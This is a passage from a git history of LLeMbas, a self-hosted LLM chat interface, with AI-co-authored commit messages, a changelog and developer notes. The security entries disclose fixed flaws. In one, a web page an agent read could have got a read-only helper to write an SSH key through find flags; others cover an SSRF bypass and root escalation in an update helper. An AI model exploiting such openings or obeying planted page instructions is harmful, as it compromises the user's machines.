  This is not graceful degradation -- most endpoints reject the entire
  request rather than ignoring an image part. A plain text turn stays a
  plain string for the same reason: the list form 400s on endpoints that
  do not implement it.
- Images reach the model as base64 data URIs, not links. A local
  endpoint has no route back to LLeMbas, and a hosted one has no
  credentials for it.
- Non-images are served Content-Disposition: attachment with nosniff, so
  an uploaded .html can never execute in this origin. Stored names are
  random; the uploader's name is a label and never a path.
- Uploads are unbound until the message is sent, which is what lets a
  file be removed beforehand. claim() only takes unclaimed rows owned by
  the sender, so a forged id cannot pull in someone else's file.
  Abandoned uploads are swept at startup.
- A scanned PDF says so rather than silently contributing nothing, and
  truncation is declared to the model in the document tag so it can
  admit it did not see page 400.
- "Here, look at this" with no words is a legitimate turn, so a message
  is only empty when it carries neither text nor files.

Also fixes auto-titling, which read message["content"] as a string and
would have broken on the first multimodal turn.

186 tests, ruff clean.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
2026-07-21 12:19:59 +02:00
Jaroslav Beneš d6c87ac811 Users, groups, permissions, model settings and reasoning display
Four features, plus the schema machinery they needed.

**Schema sync.** The first live instance had data in it, and create_all
only creates missing *tables* -- a new column silently never appeared.
db/migrations.py now diffs the declared models against the database and
ALTER TABLE ... ADD COLUMN for what is missing, deriving a backfill
default from the column type (SQLite refuses a NOT NULL column without
one, and a Python-side `default=dict` cannot be expressed in DDL).
Verified against a copy of the live database: eight changes applied, all
rows preserved, second run a no-op. Renames, drops and retypes are still
manual and say so.

**Permissions.** A flat set of named booleans: an instance baseline
widened by each group the user belongs to. A group grants and never
denies -- with denies, "why can this user not do X" cannot be answered
without simulating every group. Admins bypass entirely, because an admin
can grant it back to themselves in two clicks and pretending otherwise
is theatre. Model *access* is separate: public, or granted to groups.
The picker is not the boundary -- switching a chat to a model you cannot
reach is a 403.

**Model settings.** Ordering, pinned-first, an instance default and a
per-user default, display names, descriptions, capability flags, and
uploaded images. Images are stored and served locally rather than by
URL: a remote URL makes every page render a request to a third party.
Uploads are validated by magic number, not the declared content type,
and stored under a random name. Models with no image get a generated
initial whose hue is derived from the model id, so it is stable.

**Reasoning display.** Streams into its own collapsible block above the
answer, labelled "Thought for 14 seconds", collapsed once finished, and
never replayed as context on the next turn. Two sources: the
reasoning_content delta field, and <think> tags inline in content -- the
latter needs a streaming splitter because the tags arrive split across
chunks. Models emitting no reasoning show nothing, via a :has() rule
rather than JavaScript. Verified against qwen35-9b on llama-swap: 694
reasoning events, 52 answer tokens, cleanly separated.

Two bugs found and fixed while testing:

- A bare `Mapped[list]` relationship is treated by SQLAlchemy as a scalar
  and returns None instead of []. It needs the element type.
- FastAPI substitutes the default for an empty form value, so with
  `x: str | None = Form(None)` a submitted `x=` is indistinguishable from
  an absent field. That silently broke clearing a system prompt or a
  temperature. update_chat now reads the raw form and checks key presence.

143 tests, ruff clean.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
2026-07-21 11:49:32 +02:00
Jaroslav Beneš ba2fb1e13d Add registration toggle and password change; genericise deploy
Two things the running instance needed.

**Registration toggle.** Admin -> General, backed by a new settings table
group rather than the environment. LEMBAS_ALLOW_SIGNUP now seeds only the
initial value: once an administrator saves the setting, the stored value
wins. The alternative -- environment always winning -- means a toggle in
the UI silently reverts on the next restart, which is worse than not
offering one. Closing registration also removes the "Create one" link
from the sign-in page, so the link never leads somewhere that refuses.

**Password change**, on the user settings page. Changing a password
revokes every other session and immediately re-issues a cookie for the
current one: if the reason for the change is that somebody else knows
the password, leaving their session alive defeats the point, but signing
the user out of the tab they are standing in is merely rude.

**deploy/ is now host-agnostic.** This repository is public, so the unit
and vhost became templates with __PREFIX__ / __SITE_HOST__ / __APP_PORT__
substituted at install time, and every path, hostname and port moved to
environment variables. REPO_URL defaults to the checkout's own origin so
a fork deploys itself. Machine-specific values belong in private notes,
not here -- CLAUDE.md now says so.

83 tests, ruff clean.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
2026-07-21 11:14:33 +02:00
Jaroslav Beneš dd9e0e9440 Working chat: auth, connections, streaming, folders
LLeMbas now runs end to end. Register, add an OpenAI-compatible
connection, and hold a real streaming conversation organised into
folders. Verified against the local llama-swap instance.

Streaming is the one genuinely tricky part. Sending a message returns
two HTML fragments -- the user bubble and an empty assistant bubble
carrying an sse-connect -- and that attribute is the ONLY thing that
starts a generation. Rendering an incomplete assistant message as a
streaming shell falls out of the same template, which means loading a
page whose last reply never finished simply picks it up again.

Details worth knowing about, each commented where it matters:

- SSE payloads are split across several data: lines. A raw newline in
  one data: line truncates the event, which shows up the first time a
  model emits a code block.
- Markdown is rendered server-side by the same helper for both the page
  and the final streamed frame, so the two cannot disagree. The fence
  renderer is replaced outright rather than using markdown-it's
  highlight option, which re-wraps output in a second <pre>.
- escape_text is html.escape, not nh3.clean_text: it escapes character
  by character, so escaping stream chunks separately equals escaping
  the whole string.
- The stream opens its own session via session_scope(); it outlives the
  request handler and the dependency-scoped session may be closed.
- Deleting a folder keeps the chats inside it (FK is SET NULL). Losing
  a conversation to a mis-clicked folder delete is unforgivable.
- Login failures use one message for "no such account" and "wrong
  password" so the form cannot enumerate registered addresses.

Also adds deploy/ for the gamebox install at https://chat.lan: system
unit, nginx vhost with buffering off (buffering on turns streaming into
one lump at the end), and install/update scripts following the same
service-user and /srv bind-mount conventions as llama-swap and comfyui.

70 tests, ruff clean.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
2026-07-21 11:04:13 +02:00
329 changed files with 2036 additions and 73974 deletions
-31
View File
@@ -1,31 +0,0 @@
# What must never reach the image.
#
# The first two blocks are the ones that matter: a `data/` directory copied in
# would bake somebody's database, their uploads and their encrypted API keys
# into an image, and a `.env` would bake the key that decrypts them.
data/
*.db
*.db-wal
*.db-shm
.env
.env.*
lembas.env
# `.git` is excluded and that has a consequence worth knowing: /admin/updates
# reads it to say what is running, so inside a container that page says "not
# installed from a checkout" and offers nothing. That is correct -- a container
# is updated by pulling a new image, not by resetting a checkout inside it.
.git/
.github/
.venv/
venv/
__pycache__/
*.pyc
.pytest_cache/
.ruff_cache/
htmlcov/
.coverage
dist/
build/
*.egg-info/
-478
View File
@@ -1,478 +0,0 @@
# Changelog
What changed, per version, for somebody using or running LLeMbas — not a
restatement of the commit log. If a change fixed something that *looked* like it
worked, that is worth a line: those are the ones nobody would otherwise know to
stop working around.
Newest first. Versions are `__version__` in `src/lembas/__init__.py`, which is
the only place a version is written.
The first tagged release is **1.0.0**. Everything below it shipped as a running
deployment rather than as a release, and is recorded here so the release notes
for 1.0.0 have something to be assembled from.
---
## Unreleased
## 1.0.3
Two Arch-isms in the installer, both of which only a Debian machine could find.
`deploy/lxc-install.sh` had never been executed — it was reviewed and
syntax-checked, which is not the same claim — and running it is what found them.
- Fixed: **`deploy/install.sh` could not create its virtualenv on Debian**, and
so `deploy/lxc-install.sh` could not finish. It called bare `python`, which is
Python 3 on Arch — the machine this was written and only ever run on — and
does not exist on Debian at all unless `python-is-python3` is installed. The
LXC bootstrap installs `python3`, so the install aborted at the virtualenv
step with the service user, the bind mount and the clone already made. It now
calls `python3`, which is right on both.
- Fixed: the service account was created with `--shell /usr/bin/nologin`, which
is where Arch keeps it and where Debian does not. Nothing invoked it — `sudo -u`
execs directly and systemd's `User=` never reads a shell — so the account
worked either way, but it was created pointing at a file that was not there.
Now `/usr/sbin/nologin`, which is correct on Debian and resolves on Arch too,
since Arch's `/usr/sbin` is a symlink to `bin`.
## 1.0.2
- **The documentation moved to the [wiki](https://git.houmeres.sk/Houmeres/LLeMbas/wiki).**
`CLAUDE.md`, `PLAN.md` and `docs/` are gone from the repository: they are
documentation *about* this project rather than part of it, and a clone should
carry software. Nothing was lost — the working notes, the roadmap and the eight
topic notes are all there, with every internal link rewritten, and the README
now opens onto them. Where a source comment said "see `CLAUDE.md`" it now says
"see the working notes".
- Entries below this one still name `PLAN.md` and `docs/notes/…`, and are left as
they were written. A changelog records what happened at the time; rewriting old
entries to match a later decision makes it a worse record, not a better one.
## 1.0.1
- Fixed: the Updates page showed **"v1.0.0 (reports 1.0.0)"** — two spellings of
one version, in a note whose whole purpose is to warn that a tag was cut
before the version bump. `git describe` answers with the tag's name, and tags
here carry a `v`. Found by cutting the first release, which is the only place
it could have been.
## 1.0.0
The first release. Every version before it shipped as a running deployment
rather than as a release; this is what those add up to, and the point at which
it is worth somebody else installing.
**What it is.** A self-hosted web interface for OpenAI-compatible endpoints.
Server-rendered, no build step, no CDN, one SQLite file. Point it at whatever
you run — llama.cpp, LM Studio, vLLM, Ollama, OpenRouter, OpenAI — and it works
the same.
### What arrived since 0.8.1
- **Things that happen because time passed.** Say "every Monday at nine" and a
model sets it up itself, against the same recurrence rule the manual form
uses. A run can file a **report** you read later, send you a message, or work
in a chat of its own.
- **News that finds you.** A dot in the sidebar, a count in the tab title while
you are looking elsewhere, and **web push** so a schedule firing at seven in
the morning reaches a browser that is shut. Opt-in per device, and the one
thing here that contacts an outside service — `services/push.py` says so
plainly and says what it costs.
- **Helpers.** A reply can hand a self-contained piece of work to another model
that runs on its own and reports back, several at once. A helper cannot ask
questions, cannot send helpers of its own, changes nothing unless asked, and
on a machine runs only a fixed list of read-only commands.
- **Drawing.** Point it at a ComfyUI and a model can make images, against
workflow templates and defaults you set — size, steps, sampler, scheduler,
checkpoint. It reviews its own result and can try again.
- **Semantic search.** Pick an embedding model and library search fuses keyword
and meaning, so *"how do I get paid"* finds a document that says *"invoicing"*.
Choosing none is not a degraded mode: it is byte-for-byte the keyword search
that was always there, with nothing written and no requests made.
- **Quotas and sharing.** Monthly tokens, concurrent replies, agent wall clock,
images a day, helpers a reply — resolved by maximum across a person's groups,
with zero meaning *no limit*. Documents, notes, skills and reports can be
handed to a group or a person, read-only, with a *Shared with me* filter
everywhere. And a screen that answers **"what can this account actually do?"**
by naming where each permission came from.
- **Make it yours.** Name, tagline, logo, favicon and launcher icons; the
Middle-earth wording is editable data; custom themes defined as a set of
colours rather than a stylesheet.
- **Install it and update it.** A Dockerfile, a Proxmox container script, and an
`/admin/updates` page showing what is running, what is available and what
changed between. The button that applies an update is opt-in and cannot do the
work itself — it writes a file that a systemd unit picks up, because a web
application that can restart its own service is one whose worst day is much
worse.
### The part worth reading
Five audit passes went into this release rather than one, and they found things
that had shipped looking correct. These are the entries somebody stops working
around a bug because of:
- **Every model was told the time in a zone with no name** — on any account that
had not chosen one, which is every account by default.
- **A helper could write files and run programs on a remote machine,
unattended, in a mode that promises to change nothing.** `find` was on the
read-only command list, and `find -fprintf` writes a file.
- **Two ways to get root out of the update helper**, one of which needed no
compromise at all: root ran a script the unprivileged service account owns,
and an update fetches that script as that account.
- **Deleting a chat left every file it held on disk** — attachments, generated
images, all of it, with nothing that would ever look at them again.
- **Folder nesting was fully built, documented in the README, and reachable by
nothing.** So was moving a chat into a folder.
- **The terminal silently stopped accepting input after a reconnect**, while
output kept arriving so the panel looked healthy.
- **On the Messages screen, half the keyboard shortcuts did nothing**, because
two scripts were loaded twice and each toggle ran twice.
- **The prompt preview could not show two thirds of what it previews.**
- **Hints and timestamps failed the contrast minimum in both themes.**
### Where the edges are
Stated because they are the things worth knowing before you rely on it:
- **Nothing executes on the machine LLeMbas runs on.** Agent chats run their
commands over SSH on a host you choose, and the security of an agent chat is
the security of that host. There is no sandbox here and that is deliberate —
`PLAN.md` records the one that was designed and dropped, and why.
- **One worker.** The generation registry, the terminal sessions and the
schedule ticker are all in-process. Two workers means two tickers and every
schedule firing twice.
- **A restart abandons replies in flight**, keeping whatever each had.
- **Schema changes are additive.** New tables and columns apply themselves at
startup; renames and drops are manual. The upgrade path is tested from an
0.8.1-shaped database with rows in it.
- **Sharing grants reading only.**
2283 tests on Python 3.11, 3.12 and 3.14.
## 0.9.13
**The testing pass.** 2140 tests became 2283, and writing them found four bugs
that no amount of reading had.
- Fixed: **the terminal silently stopped accepting input after a reconnect.**
Change the connection, or let the shell catch up after falling behind, and
every keystroke was dropped from then on — while output kept arriving, so the
panel looked perfectly healthy. It also announced "Disconnected. Close and
reopen to reconnect." about a shell that had just reconnected successfully.
- Fixed: **on the Messages screen, half the keyboard did nothing.** Two scripts
were loaded twice there, so `Alt+B`, `Alt+E`, `Alt+T` and `Alt+I` toggled
their panel twice — which is to say not at all — while `/help` opened two
dialogs, `/image` posted the message twice, and picking an `@` mention
attached the file twice.
- Fixed: **pressing the microphone while the permission prompt was up opened a
recording each time.** Only the last was stopped, so the browser's recording
indicator stayed on until the tab was closed.
- Fixed: **a skill shared with you took its name out of your own library.**
Creating your own was refused with "a skill called that already exists. Edit
it instead" — naming a skill you cannot edit, because sharing grants reading
only. The model's `skill_create` hit the same dead end. Sharing a curated
skill with a team is what sharing is *for*.
- Hints and timestamps are readable now. `--ink-faint` failed the accessibility
contrast minimum in **both** themes — 3.85:1 in Moria, 3.19:1 in Shire, where
4.5:1 is the bar — so the smallest text on every screen was the hardest to
read.
- The suite runs on **Python 3.11 and 3.12** as well as 3.14. It had only ever
run on 3.14, while the Docker image ships 3.12 and the packaging claimed 3.11
— so the one interpreter most people would actually run was the one nothing
had tested.
- A `docs/notes/release-checklist.md` for the half of testing a machine cannot
do: a real endpoint, a real machine, real hardware, a real pair of eyes.
## 0.9.12
**The security pass.** Six findings, all fixed. None is reachable by simply
visiting the site; every one of them is a boundary that was supposed to hold
and did not.
- Fixed: **a helper could write files and run programs on the remote machine,
unattended, in a mode that promises to change nothing.** A subagent is pinned
to a fixed list of read-only commands — and `find` was on it. `find -fprintf`
writes a file, `find -exec` runs a program, `find -delete` removes one, and
none of them needs a character the shell-metacharacter guard refuses. A page
the model had just read could have asked for a helper and got an SSH key
written into `authorized_keys`. Those flags are refused outright now, whatever
list a command is on.
- Fixed: **an SSH connection could be pointed at `0.0.0.0` and reach the machine
LLeMbas runs on**, with the "may a connection point here" setting still
reading *off*. Every other spelling was caught; that one is neither a real
destination nor a refused one, and connecting to it goes to localhost.
- Fixed, twice, in the update helper — the one place this deliberately crosses a
privilege boundary: **root ran a script the unprivileged service account
owns**, and **root sourced a file that account can replace**. Either turns a
compromise of the web application into root on the host, which is exactly what
the unprivileged split exists to prevent. The first also meant control of the
branch was control of root, with no compromise needed at all.
**If you installed the update helper before this, re-run the installer**
the old wiring stays until you do, and the update script now says so loudly
when it notices.
- Fixed: **browser notification endpoints skipped the guard that stops the
server being aimed at your own network.** It was the only outbound request in
the codebase not going through it.
- Fixed: **a chat could be put in another account's folder**, and a folder hands
its system prompt to the chats inside it — so that read a setting across an
ownership boundary through a field that looks like a tag.
- Fixed: a `"` typed into the share panel's search box silently stopped every
checkbox in the panel from doing anything.
- Fixed: **re-running the installer moved the update channel to `stable`** even
on a host following `edge`. The channel lives in two places — the environment
file the page reads and the systemd unit the button obeys — and a re-run kept
the first while rewriting the second, so an install for some unrelated reason
left the page naming one channel and the button deploying another. It now
defaults to what the host already follows.
## 0.9.11
- The Updates page no longer runs the **Check the remote** button flush against
the version and commit above it, where the two read as one block.
## 0.9.10
**The second audit pass: screens that were harder to use than they needed to
be.** Checked by rendering them in a real browser and measuring, not by reading
the CSS.
- Fixed: **the Prompts admin page put its reference material first.** The
Variables legend and the Preview run to a screen each and sat above the tabs,
so the editor — the thing the page is for — started two screens down and every
tab switch had to move the whole page to be any use. On a short tab it could
not move far enough and left the panel stranded above a screenful of nothing.
The editor comes first now, the reference after, and the tab bar stays put:
measured, it moved 385→642px between tabs before and does not move at all now.
The tab bar also sticks to the top, so a long panel does not scroll it away.
- Fixed: **custom themes were three fixed slots.** A fresh instance opened on
fifty-seven empty colour boxes under three identical headings, and a fourth
theme could not be made at all. Now: one block per theme you have, plus one
blank to add the next, with the colours behind a disclosure — so a theme is a
name and a starting point until you ask for more. Up to twelve. The page is
half the height it was.
- Fixed: **deleting a chat left every file it held on disk.** The rows went —
the message, the attachments, the generated images — and the files they named
stayed, with nothing that would ever look at them again. Four of the five ways
a chat can end had this: the delete button, a schedule's task chat, a helper's
hidden chat, and deleting an account. There is one function that deletes a
chat now, and it removes the files first.
- Fixed, and it is what made the above invisible: **a file attached before the
chat existed never learned which chat it belonged to.** Anything picked on the
new-chat screen kept an empty `chat_id` for the rest of its life. Six things
filter on that, so for those files the model was not told they were attached,
the canvas would not open them, and the cleanup could not find them.
- **Folders can be nested, which the README has always claimed.** The route has
handled it since folders existed — cycle guard, depth limit — and the sidebar
has always drawn a tree; there was simply no control that could ask for it.
Moving a folder also respects the depth limit now, which only creating one did.
- The Proxmox container installs the **update helper by default**. A container
made thirty seconds ago to run one thing is not the shared host the plain
installer has to be careful about, and an appliance you cannot update without
a shell is one nobody updates. `INSTALL_UPDATE_HELPER=0` opts out. Docker
deliberately has no equivalent: updating a container is pulling an image, and
a helper inside one would need the Docker socket, which is root on the host.
- The starting points on the new-chat screen are four new ones, aimed at
somebody who has just stood an instance up and wants to know what is behind
it. Only a fresh install gets them; an instance that has already seeded keeps
whatever its administrator has made of the list.
- `README.md` describes what this actually is again — schedules, reports,
helpers, image generation, semantic search, quotas, sharing, branding and the
updates page were all missing, and two things listed as *planned* had shipped.
It gained sections on Docker, the Proxmox container and updating.
## 0.9.9
**The first of five audit passes before 1.0.0** — everything that landed between
0.8.1 and 0.9.8 read as a whole rather than one feature at a time. This one is
the main logic, the harness, and every instruction a model is given.
- Fixed: **every model was told the time in a zone with no name.** On any
account that had not chosen a timezone — which is the default state of every
account — the date line shipped as "Times the person gives you are in
unless they say otherwise", on every request. The code claimed in two places
that the line disappeared instead. It never had.
- Fixed: **the prompt preview could not show most of what it previews.** Eleven
fragments are gated on things that only exist once there is a real chat, and
the preview has none — so the whole agent surface, both scheduling fragments
and the helper warning were missing from it whatever you ticked. Editing
`tool.agent` and pressing preview showed a system message without `tool.agent`
in it, and nothing said so. Two new controls come with the fix: what kind of
chat to preview as, and which agent mode.
- Fixed: **a model in Plan mode was told to use a tool it did not have.**
`plan_update` is withdrawn in that mode in favour of `plan_submit`, but its
guidance appeared whenever a plan existed — directly under the line saying
anything not in your tool list does not exist.
- Fixed: **reading one knowledge document could fill the whole context window.**
Every other reader caps what it returns and says so; this one returned the
document whole, and its description said "in full", so it did exactly what it
claimed. A long PDF is now cut at 40,000 characters with the model told.
- Fixed: **the guidance about helpers on a machine was wrong in both
directions.** It denied that a helper can write files, which is a documented
option of the tool beside it, and it named seven of the twenty-three commands
a helper may run — so a model avoided commands it was allowed to use. Both are
now checked against the real list and the real schema by tests, because prose
and a constant drift the moment one is edited alone.
- The tool description for delegating no longer claims a helper gets "the same
tools". It gets deliberately fewer, and sizing a task against the wrong set is
how a whole phase gets planned around something that will refuse it.
- The Updates page notices when the update helper on a host was installed for a
**different channel** than the page follows. It is declared in two places —
`lembas.env` and the systemd unit — and only the installer writes both, so
editing one by hand would have left the button deploying something other than
what the page named, with nothing anywhere saying so.
- Fixed: release notes from a **signed** tag rendered the signature block.
`_notes_for` stripped the PGP header only, and which header appears depends on
`gpg.format` — this repository signs with SSH.
- A `CHANGELOG.md`, kept from now on rather than assembled at release time.
## 0.9.8
**Updates follow a channel, not a commit.** `stable` tracks the newest `vX.Y.Z`
tag; `edge` tracks the branch tip. A branch tip is not a release — following one
means deploying whatever was pushed five minutes ago — so stable is the default
for anybody who is not the person writing it.
- The Updates page shows a **version** rather than a commit sha: `1.0.0` at a
tag, `1.0.0-7-gd4f56d` seven commits past one, and a bare sha only before the
first release exists.
- Release notes come out of the **annotated tag itself**, so no forge API is
involved anywhere. That matters: the Gitea API this was checked against
returns a 500 from a server-side panic on exactly the releases endpoint.
- A tag with a suffix (`v1.1.0-rc1`) is deliberately not a release — git's
version sort ranks it *above* `v1.1.0`, so accepting one would step a stable
host onto a candidate.
- Fixed: `deploy/update.sh` stopped silently after `== fetching ==` on any host
with no release tags — which was every host. Fetched, not reset, not
restarted, and no error printed.
- Fixed: `install.sh` now refuses an `ssh://` repository URL up front instead of
letting the clone fail as a service user with no key.
## 0.9.7
**Packaging, and updating without a shell.**
- `/admin/updates`: what is running, what is available, and what changed between.
A button applies it — answered by an **opt-in** systemd helper, because the
service runs unprivileged and a web application that can restart its own
service is one whose worst day is much worse. Without the helper the page says
so and prints the command.
- `Dockerfile` and `docker-compose.yml`. No secret key, no data and no `.git`
baked in; loopback only; a TLS proxy expected in front, because a service
worker and a microphone both require HTTPS or localhost.
- `deploy/lxc-install.sh` creates an unprivileged Proxmox container and runs the
existing installer inside it.
- `/healthz`, which opens the database rather than only proving the socket is
listening.
## 0.9.6
**Permissions, quotas and sharing.**
- **"What can this account actually do?"** answered on screen, naming *where*
each permission came from — admin, the baseline, or a group.
- Users and groups are list-plus-detail, and membership is edited from **one**
side. It was on both, and a save from either overwrote what the other showed.
- Reading and writing split for notes, memory and skills.
- **Quotas on a group** — monthly tokens, concurrent replies, agent wall clock,
images a day, helpers a reply. Resolved by maximum across a person's groups,
with zero meaning *no limit* and winning outright.
- Fixed: **deleting a group or an account left every share naming it behind.**
`forget_principal` had existed since shares did and was called by nobody.
- Fixed: `library.share` defaulted to off, so sharing shipped documented as done
and unreachable — the panel only renders for somebody who holds it.
- The share panel is its own action with a search box. It used to be checkboxes
inside the resource's save form, listing every account on the instance, and a
tick only took effect if you also saved the resource.
- Reports are shareable, and every listing has a **Shared with me** filter.
## 0.9.5
**Extraction settings, embeddings, and hybrid search.**
- `/admin/extraction`: upload size, image edge, JPEG quality, PDF pages,
extracted characters, orphan age, extra text extensions.
- An **embedding model** can be chosen from models flagged for it. Library search
then fuses keyword and semantic ranking, so *"how do I get paid"* finds a
document that says *"invoicing"*.
- **Choosing none is not a degraded mode**: no rows written, no requests made,
and byte-for-byte the keyword search that was always there.
- Vectors carry their model and width, and a mismatch is skipped rather than
scored — comparing two embedding spaces produces a confident wrong answer.
- Indexing happens in the background as records are written, with a rebuild
button for everything that already existed.
## 0.9.4
**An instance can be somebody else's.**
- Name, tagline, logo, favicon and launcher icons derived from the logo.
- The Middle-earth wording is editable data. Leaving a box alone does not freeze
it, so a later release can still improve the default.
- **Custom themes** as a set of colours rather than a stylesheet, inheriting
whichever built-in they start from.
- Global CSS overrides, served as `/branding.css`.
## 0.9.3
**Subagents.** A reply can hand a self-contained piece of work to a helper that
runs on its own and reports back — several at once, so research fans out instead
of queueing.
- A helper cannot ask questions, cannot send helpers of its own, writes nothing
unless the call asked and the chat's mode allowed it, and on a machine runs
only a fixed list of read-only commands — in **every** mode, including Auto.
- Fixed, and it was live in scheduled runs too: an unattended chat that hit an
approval built a card nobody could see and sat on it for fifteen minutes.
## 0.9.2
**Image generation defaults an administrator can actually set** — steps, cfg,
size, sampler, scheduler, denoise, negative prompt, checkpoint, batch. There were
none: one hard-coded set from the SD1.5 era, and prose in a box as the only way
to change it.
- The samplers and schedulers ComfyUI had been reporting all along are now the
pickers; nothing had ever read them.
- The tool's own schema restates the instance's defaults, instead of telling the
model "Default 512" beside an instance that draws at 1024.
## 0.9.1
**Everything that arrives is announced, not only chat replies.** A scheduled run
that filed a report used to light a dot in a corner and say nothing.
- A count in the tab title while you are looking elsewhere.
- **Web push**, so a schedule firing at seven in the morning reaches a browser
that is shut. Opt-in per device. It is the one thing here that contacts an
outside service, and `services/push.py` says so plainly.
## 0.9.0
**A model can schedule things.** There was no tool for it — asked to "remind me
every Monday", a model wrote a note and reported that it had scheduled
something, and every screen agreed with it.
- `schedule_create`, `schedule_list`, `schedule_update`, `schedule_cancel`, over
the same rule normaliser the manual form uses.
- The reply says the resulting timing back in words, which is the only moment
anybody can check that Monday was understood as Monday.
## 0.8.3
**An SSH connection may not point at this machine unless an administrator says
so.** A profile aimed at `127.0.0.1` walked straight past "nothing runs on the
LLeMbas host" — through a real login, onto the machine holding the database and
the encryption key. Three positions: off, one named port, or anywhere.
## 0.8.2
- Fixed: **opening the canvas before a chat existed swapped the whole site into
the panel.** `hx-get=""` is not "fetch nothing" — htmx looks for the attribute,
not the value, so the empty one was a real request for the current document.
- Fixed: the Canvas and Terminal buttons appeared where they could not work.
- The bottom edge of the shell is no longer drawn, so the sidebar footer and the
composer stop meeting a line at two different heights.
- Admin pages scroll in one container; `/admin/prompts` no longer drops you at
the bottom of a shorter panel.
+540
View File
@@ -0,0 +1,540 @@
# CLAUDE.md
Working notes for LLeMbas. Read this before changing anything.
## What it is
A self-hosted web UI for OpenAI-compatible LLM endpoints, written in Python and
themed after Middle-earth. Server-rendered FastAPI + Jinja + htmx; SQLite;
no JavaScript build step.
## Commands
```bash
. .venv/bin/activate
pip install -e ".[dev,search]" # `search` adds ddgs for DuckDuckGo
lembas serve # http://127.0.0.1:8080
lembas info # paths + counts, useful when confused
lembas secret-key # generate LEMBAS_SECRET_KEY
lembas create-admin # create or promote an admin
pytest # 590 tests, ~35s
# PLAN.md tracks what is and is not built
ruff check . # lint (line length 100)
python scripts/build_artwork.py # regenerate artwork (SVG + PWA icons;
# needs fonttools and cairosvg)
python scripts/fetch_vendor.py # verify vendored JS against the lockfile
```
## Hard rules
These are the constraints the project is built around. Breaking one is a
redesign, not a tweak.
1. **No Node, no npm, no build step.** Browser libraries are downloaded once by
`scripts/fetch_vendor.py`, hash-pinned in `scripts/vendor.lock.json`, and
committed under `web/static/vendor/`.
2. **Nothing loads from a CDN at runtime.** A self-hosted tool must work
offline and must not report page views to a third party.
3. **No hard-coded values outside `tokens.css`.** Every colour, space, radius
and control height resolves through a CSS variable. `--control-h` is why
buttons, inputs and selects line up: they all take their height from it, so
a mixed row is flush by construction rather than by nudging.
4. **Additive-only schema changes.** SQLite only, no Alembic. `init_db()` runs
`db/migrations.py:sync_schema()`, which creates missing tables *and* adds
missing columns by diffing the models against the database. Renames, drops
and retypes are still manual. See "Changing the schema" below.
5. **Secrets never reach the browser.** API keys are Fernet-encrypted at rest
and only ever rendered masked.
6. **Model output is untrusted.** Everything from an endpoint goes through
`services/markdown.py` (markdown-it → nh3) or `escape_text()`. Never
`|safe` on anything that has not.
## The flavour rule
Middle-earth lives in the **artwork, theme names, empty states, loading lines
and error pages**. It does not live in the functional UI.
Chats are called *Chats*, not *Tales*. Folders are *Folders*, not *Chapters*.
Buttons say what they do. Someone who has never read the books must be able to
use this without a glossary. The two themes are named `moria` and `shire`, and
the 404 says "Not all those who wander are lost. This page, however, is." —
that is the right amount.
## Layout
```
src/lembas/
main.py app factory, lifespan, error handlers
config.py pydantic-settings, all LEMBAS_* variables
cli.py typer entry points
api/
deps.py Db / CurrentUser / RequiredUser / AdminUser
auth.py register, login, logout
pages.py full-page routes (chat shell, settings)
chats.py messaging + the SSE stream
folders.py folder CRUD
admin.py connections + instance settings
admin_models.py model ordering, defaults, images, access
admin_users.py users, groups, permissions
admin_audio.py speech-to-text and text-to-speech endpoints
admin_search.py web search provider and credentials
admin_prompts.py the prompt fragment editor and its preview
admin_suggestions.py the cards offered on the new-chat screen
audio.py transcribe, speak, voice discovery
library.py knowledge, notes, skills pages; memory CRUD
files.py upload, serve, remove attachments
preferences.py per-user theme, default model, password, audio
db/
base.py Base, UUID/Timestamp mixins
session.py engine, SQLite pragmas, init_db, session_scope
migrations.py additive schema sync (tables + columns)
models/ user, chat, connection, setting
security/ passwords (argon2), sessions, permissions
services/
llm/openai_client.py httpx streaming + model discovery
search/ ddgs, SearXNG and Firecrawl behind one shape
library/ documents, notes, memories, skills, FTS
audio.py OpenAI-shaped /v1/audio/* client
fetch.py URL retrieval, HTML to text, the SSRF guard
sharing.py one visibility rule for every library store
prompts.py every injected prompt fragment, and {{variables}}
metrics.py tokens, context percentage and tokens/second
tokens.py the chars/4 estimate, for endpoints that report none
compaction.py summarising the earlier turns of a long chat
suggestions.py new-chat starting points, seeded once
harness.py the operational prompt built from what a model has
tools.py tool registry, schemas, streamed-call reassembly
chat.py request building, endpoint resolution, titles
markdown.py markdown-it + pygments + nh3
crypto.py Fernet encrypt/decrypt/mask
files.py attachment validation, images, PDF/text extraction
reasoning.py splits thinking from the answer
settings_store.py runtime instance settings
uploads.py validated image storage
sse.py event framing
web/
templating.py render() -- always use this, not TemplateResponse
templates/ Jinja
static/ css, js, vendor, img, sw.js
assets/ SVG masters and PWA icons (generated)
deploy/ systemd unit, nginx vhost, install/update scripts
```
## Things that will bite you
**`render()`, not `TemplateResponse`.** `web/templating.py:render()` injects
`user`, `theme`, `version` and `allow_signup`. Templates assume they exist. If
you must call `templates.TemplateResponse` directly (the SSE path does, because
there is no `Request`), pass `user` explicitly — `chat/_message.html` renders
both roles and the user branch dereferences it.
**The message template is the state machine.** `chat/_message.html` renders an
incomplete assistant message as a streaming shell carrying `sse-connect`, and a
complete one as finished output. That is the *only* thing that starts a
generation. A consequence worth knowing: loading a page whose last reply is
unfinished restarts it, which is how a dropped connection recovers.
**SSE framing.** `services/sse.py:event()` splits payloads on newlines into
several `data:` lines. A raw newline in a single `data:` line truncates the
event — the failure shows up the first time a model emits a code block.
**Streaming opens its own database session.** `api/chats.py:_generate()` uses
`session_scope()`, not the request's session, because streaming outlives the
request handler.
**Escaping is chunk-safe on purpose.** `escape_text()` is `html.escape`, which
works character by character, so escaping stream chunks separately equals
escaping the whole string. `nh3.clean_text` would also be safe but escapes
spaces and slashes, tripling the size of every streamed token.
**The fence renderer is replaced, not configured.** markdown-it's `highlight`
option re-wraps output in `<pre><code>` unless the string starts with `<pre`,
which would nest a second `<pre>` inside our wrapper. `markdown.py` overrides
`renderer.rules["fence"]` instead. There is a regression test for this.
**SVG `<style>` is document-scoped.** Two text runs in one SVG sharing a class
name means the later rule recolours both. `build_artwork.py` takes class names
as parameters for exactly this reason.
**Gradient ids are document-global.** The `mark()` macro takes a `uid` because
two marks on one page with identical ids make the second silently reuse the
first one's gradients.
**Two kinds of settings.** `lembas.config` is deployment configuration read
